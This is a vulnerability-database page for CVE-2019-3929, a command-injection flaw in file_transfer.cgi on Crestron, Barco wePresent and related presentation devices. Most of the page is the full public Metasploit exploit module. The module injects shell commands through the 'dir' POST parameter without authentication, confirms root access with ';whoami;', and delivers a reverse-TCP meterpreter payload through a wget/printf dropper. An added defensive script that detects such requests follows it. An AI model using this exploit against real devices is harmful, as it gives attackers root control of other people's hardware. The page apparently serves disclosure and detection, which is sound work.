CVE-2019-3929

Published 2022-04-15 · Modified 2022-04-15
CVSS v3
—
CVSS v4
—
not yet in upstream
VIR risk
2.5

Description

Multiple Crestron products are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.

CISA KEV

Vendor
Crestron
Product
Multiple Products
Due date
2022-05-06

Predictions

Exploit likelihood
99%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-47924 remote linux verified ruby · 3 KB
Metasploit · 2020-01-15

Barco WePresent - file_transfer.cgi Command Injection (Metasploit)

Ruby exploit. Source: Exploit-DB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
      'Description'    => %q(
        This module exploits an unauthenticated remote command injection
        vulnerability found in Barco WePresent and related OEM'ed products.
        The vulnerability is triggered via an HTTP POST request to the
        file_transfer.cgi endpoint.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => 'Jacob Baines', # @Junior_Baines
      'References'     =>
        [
          ['CVE', '2019-3929'],
          ['EDB', '46786'],
          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
        ],
      'DisclosureDate' => "Apr 30, 2019",
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => false,
      'Targets'        => [
        ['Unix In-Memory',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
         'Type'        => :unix_memory,
         'Payload'     => {
           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
         }],
        ['Linux Dropper',
         'Platform'        => 'linux',
         'Arch'            => ARCH_ARMLE,
         'CmdStagerFlavor' => ['printf', 'wget'],
         'Type'            => :linux_dropper]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {
        'SSL'               => true,
        'RPORT'             => 443,
        'CMDSTAGER::FLAVOR' => 'printf',
        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
      }))
  end

  # The request is sent with ';', '+' and '&' rewritten as the tokens below.
  # The check method relies on a command wrapped this way still executing,
  # so the endpoint evidently maps the tokens back to the original characters.
  def filter_bad_chars(cmd)
    cmd.gsub!(/;/, 'Pa_Note')
    cmd.gsub!(/\+/, 'Pa_Add')
    cmd.gsub!(/&/, 'Pa_Amp')
    return cmd
  end

  # Wrap the encoded command in single quotes and submit it as the 'dir'
  # parameter of a POST to file_transfer.cgi. timeout is passed straight
  # through to send_request_cgi.
  def send_command(cmd, timeout)
    vars_post = {
      file_transfer: 'new',
      dir: "'#{filter_bad_chars(cmd)}'"
    }

    send_request_cgi({
      'uri'       => '/cgi-bin/file_transfer.cgi',
      'method'    => 'POST',
      'vars_post' => vars_post
    }, timeout)
  end

  # Send ';whoami;' and treat a 200 response whose body is exactly "root"
  # as proof that the injection works and runs as root.
  def check
    check_resp = send_command(";whoami;", 5)
    unless check_resp
      return CheckCode::Unknown('Connection failed.')
    end

    if check_resp.code == 200
      check_resp.body.gsub!(/[\r\n]/, "")
      if check_resp.body == "root"
        return CheckCode::Vulnerable
      end
    end

    CheckCode::Safe
  end

  # Run the payload in a subshell, backgrounded with '&' so the HTTP
  # request returns without waiting for the payload to finish.
  def execute_command(cmd, _opts = {})
    send_command(";(#{cmd})&", nil)
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 128)
    end
  end
end
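The module above fixes the shape of a malicious request to this endpoint: a POST to /cgi-bin/file_transfer.cgi whose dir parameter carries either the Pa_Note/Pa_Add/Pa_Amp substitution tokens or raw shell metacharacters. The following detection script is an added example written for this page; it is not part of the Exploit-DB entry or the Metasploit module. It assumes a proxy or WAF log that records request bodies (SAMPLE_REQUESTS is a constructed stand-in for such records) and flags requests matching that shape.

```ruby
require 'cgi'

# Constructed stand-in for proxy/WAF records that include the request body.
# The endpoint and parameter names come from the Metasploit module above.
SAMPLE_REQUESTS = [
  { method: 'POST', path: '/cgi-bin/file_transfer.cgi',
    body: 'file_transfer=new&dir=%27Pa_NotewhoamiPa_Note%27' }, # token-encoded injection
  { method: 'POST', path: '/cgi-bin/file_transfer.cgi',
    body: 'file_transfer=new&dir=uploads' },                     # ordinary use
  { method: 'POST', path: '/cgi-bin/file_transfer.cgi',
    body: 'file_transfer=new&dir=%27%3B%28id%29%26%27' },        # raw metacharacters, URL-encoded
  { method: 'GET',  path: '/index.html', body: '' }              # unrelated request
].freeze

TARGET_PATH = '/cgi-bin/file_transfer.cgi'
# Tokens the module substitutes for ';', '+' and '&' before sending.
TOKEN_RE = /Pa_Note|Pa_Add|Pa_Amp/
# Characters that separate or group shell commands; none belongs in a directory name here.
SHELL_META_RE = /[;&|`$()]/

# Parse an application/x-www-form-urlencoded body into a flat Hash, keeping
# the first value per key. CGI.parse percent-decodes the values for us.
def form_params(body)
  CGI.parse(body.to_s).transform_values(&:first)
end

# Classify one request record: :encoded_tokens, :shell_metachars or nil.
def classify(req)
  return nil unless req[:method] == 'POST' && req[:path] == TARGET_PATH
  dir = form_params(req[:body])['dir'].to_s
  return :encoded_tokens  if dir.match?(TOKEN_RE)
  return :shell_metachars if dir.match?(SHELL_META_RE)
  nil
end

# Run classify over a batch; returns [index, reason, decoded dir] per hit.
def triage(requests)
  requests.each_with_index.map do |req, i|
    reason = classify(req)
    [i, reason, form_params(req[:body])['dir']] if reason
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_REQUESTS).each do |i, reason, dir|
    puts "request #{i}: #{reason} (dir=#{dir.inspect})"
  end
end
```

Both the token form and the raw-metacharacter form are matched because the module rewrites only three characters; a hand-built request could send the rest directly. The path and method check keeps benign traffic to other CGIs out of the result, and the decoded dir value is returned alongside the reason so an analyst can see exactly what was submitted.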
EDB-46786 webapps hardware
Jacob Baines · 2019-05-03

Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection


Metasploit modules

Barco WePresent file_transfer.cgi Command Injection
